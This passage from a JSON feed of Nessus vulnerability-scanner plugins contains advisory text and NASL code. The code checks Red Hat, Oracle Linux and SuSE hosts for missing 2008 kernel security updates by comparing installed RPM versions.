flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debug-devel-2.6.18-92.1.6.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-devel-2.6.18-92.1.6.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-doc-2.6.18-92.1.6.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-headers-2.6.18-92.1.6.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-xen-2.6.18-92.1.6.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-xen-devel-2.6.18-92.1.6.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:44:10", "description": "From Red Hat Security Advisory 2008:0519 :\n\nUpdated kernel packages that fix various security issues and a bug are\nnow available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\n* A security flaw was found in the Linux kernel memory copy routines,\nwhen running on certain AMD64 systems. If an unsuccessful attempt to\ncopy kernel memory from source to destination memory locations\noccurred, the copy routines did not zero the content at the\ndestination memory location. This could allow a local unprivileged\nuser to view potentially sensitive data. (CVE-2008-2729, Important)\n\n* Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n64-bit emulation. This could allow a local unprivileged user to\nprepare and run a specially crafted binary, which would use this\ndeficiency to leak uninitialized and potentially sensitive data.\n(CVE-2008-0598, Important)\n\n* Brandon Edwards discovered a missing length validation check in the\nLinux kernel DCCP module reconciliation feature. This could allow a\nlocal unprivileged user to cause a heap overflow, gaining privileges\nfor arbitrary code execution. (CVE-2008-2358, Moderate)\n\nAs well, these updated packages fix the following bug :\n\n* Due to a regression, 'gettimeofday' may have gone backwards on\ncertain x86 hardware. This issue was quite dangerous for\ntime-sensitive systems, such as those used for transaction systems and\ndatabases, and may have caused applications to produce incorrect\nresults, or even crash.\n\nRed Hat Enterprise Linux 5 users are advised to upgrade to these\nupdated packages, which contain backported patches to resolve these\nissues.", "edition": 26, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : kernel (ELSA-2008-0519)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0598", "CVE-2008-2729", "CVE-2008-2358"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-PAE", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:kernel-xen-devel", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-PAE-devel", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-xen"], "id": "ORACLELINUX_ELSA-2008-0519.NASL", "href": "https://www.tenable.com/plugins/nessus/67706", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0519 and \n# Oracle Linux Security Advisory ELSA-2008-0519 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67706);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-2358\", \"CVE-2008-2729\");\n script_bugtraq_id(29603, 29942);\n script_xref(name:\"RHSA\", value:\"2008:0519\");\n\n script_name(english:\"Oracle Linux 5 : kernel (ELSA-2008-0519)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0519 :\n\nUpdated kernel packages that fix various security issues and a bug are\nnow available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\n* A security flaw was found in the Linux kernel memory copy routines,\nwhen running on certain AMD64 systems. If an unsuccessful attempt to\ncopy kernel memory from source to destination memory locations\noccurred, the copy routines did not zero the content at the\ndestination memory location. This could allow a local unprivileged\nuser to view potentially sensitive data. (CVE-2008-2729, Important)\n\n* Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n64-bit emulation. This could allow a local unprivileged user to\nprepare and run a specially crafted binary, which would use this\ndeficiency to leak uninitialized and potentially sensitive data.\n(CVE-2008-0598, Important)\n\n* Brandon Edwards discovered a missing length validation check in the\nLinux kernel DCCP module reconciliation feature. This could allow a\nlocal unprivileged user to cause a heap overflow, gaining privileges\nfor arbitrary code execution. (CVE-2008-2358, Moderate)\n\nAs well, these updated packages fix the following bug :\n\n* Due to a regression, 'gettimeofday' may have gone backwards on\ncertain x86 hardware. This issue was quite dangerous for\ntime-sensitive systems, such as those used for transaction systems and\ndatabases, and may have caused applications to produce incorrect\nresults, or even crash.\n\nRed Hat Enterprise Linux 5 users are advised to upgrade to these\nupdated packages, which contain backported patches to resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-June/000658.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(189, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2008-0598\", \"CVE-2008-2358\", \"CVE-2008-2729\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2008-0519\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-2.6.18-92.1.6.0.2.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-92.1.6.0.2.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-devel-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-92.1.6.0.2.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-2.6.18-92.1.6.0.2.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-devel-2.6.18-92.1.6.0.2.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-devel-2.6.18-92.1.6.0.2.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-doc-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-doc-2.6.18-92.1.6.0.2.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-headers-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-headers-2.6.18-92.1.6.0.2.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-2.6.18-92.1.6.0.2.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-devel-2.6.18-92.1.6.0.2.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:06:09", "description": "Updated kernel packages that fix various security issues and a bug are\nnow available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\n* A security flaw was found in the Linux kernel memory copy routines,\nwhen running on certain AMD64 systems. If an unsuccessful attempt to\ncopy kernel memory from source to destination memory locations\noccurred, the copy routines did not zero the content at the\ndestination memory location. This could allow a local unprivileged\nuser to view potentially sensitive data. (CVE-2008-2729, Important)\n\n* Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n64-bit emulation. This could allow a local unprivileged user to\nprepare and run a specially crafted binary, which would use this\ndeficiency to leak uninitialized and potentially sensitive data.\n(CVE-2008-0598, Important)\n\n* Brandon Edwards discovered a missing length validation check in the\nLinux kernel DCCP module reconciliation feature. This could allow a\nlocal unprivileged user to cause a heap overflow, gaining privileges\nfor arbitrary code execution. (CVE-2008-2358, Moderate)\n\nAs well, these updated packages fix the following bug :\n\n* Due to a regression, 'gettimeofday' may have gone backwards on\ncertain x86 hardware. This issue was quite dangerous for\ntime-sensitive systems, such as those used for transaction systems and\ndatabases, and may have caused applications to produce incorrect\nresults, or even crash.\n\nRed Hat Enterprise Linux 5 users are advised to upgrade to these\nupdated packages, which contain backported patches to resolve these\nissues.", "edition": 28, "published": "2008-07-02T00:00:00", "title": "RHEL 5 : kernel (RHSA-2008:0519)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0598", "CVE-2008-2729", "CVE-2008-2358"], "modified": "2008-07-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:enterprise_linux:5.2", "p-cpe:/a:redhat:enterprise_linux:kernel-xen", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE", "p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2008-0519.NASL", "href": "https://www.tenable.com/plugins/nessus/33377", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0519. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33377);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-2358\", \"CVE-2008-2729\");\n script_bugtraq_id(29603, 29942);\n script_xref(name:\"RHSA\", value:\"2008:0519\");\n\n script_name(english:\"RHEL 5 : kernel (RHSA-2008:0519)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix various security issues and a bug are\nnow available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\n* A security flaw was found in the Linux kernel memory copy routines,\nwhen running on certain AMD64 systems. If an unsuccessful attempt to\ncopy kernel memory from source to destination memory locations\noccurred, the copy routines did not zero the content at the\ndestination memory location. This could allow a local unprivileged\nuser to view potentially sensitive data. (CVE-2008-2729, Important)\n\n* Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n64-bit emulation. This could allow a local unprivileged user to\nprepare and run a specially crafted binary, which would use this\ndeficiency to leak uninitialized and potentially sensitive data.\n(CVE-2008-0598, Important)\n\n* Brandon Edwards discovered a missing length validation check in the\nLinux kernel DCCP module reconciliation feature. This could allow a\nlocal unprivileged user to cause a heap overflow, gaining privileges\nfor arbitrary code execution. (CVE-2008-2358, Moderate)\n\nAs well, these updated packages fix the following bug :\n\n* Due to a regression, 'gettimeofday' may have gone backwards on\ncertain x86 hardware. This issue was quite dangerous for\ntime-sensitive systems, such as those used for transaction systems and\ndatabases, and may have caused applications to produce incorrect\nresults, or even crash.\n\nRed Hat Enterprise Linux 5 users are advised to upgrade to these\nupdated packages, which contain backported patches to resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-0598\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-2358\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-2729\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0519\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(189, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2008-0598\", \"CVE-2008-2358\", \"CVE-2008-2729\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2008:0519\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0519\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-devel-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debug-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-devel-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-devel-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"kernel-doc-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"kernel-headers-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-headers-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-xen-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-devel-2.6.18-92.1.6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-xen-devel-2.6.18-92.1.6.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-devel / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:45:30", "edition": 19, "description": "This kernel security update fixes lots of bugs and some", "published": "2012-05-17T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 5605)", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3272", "CVE-2008-0598", "CVE-2008-3275", "CVE-2008-1673"], "cpe": ["cpe:/o:suse:suse_linux"], "modified": "2012-05-17T00:00:00", "id": "SUSE_KERNEL-5605.NASL", "href": "https://www.tenable.com/plugins/nessus/59130", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59130);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-1673\", \"CVE-2008-3272\", \"CVE-2008-3275\");\n\n script_name(english:\"SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 5605)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"This kernel security update fixes lots of bugs and some\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-0598.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-1673.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3272.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3275.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 5605.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 189, 200, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n 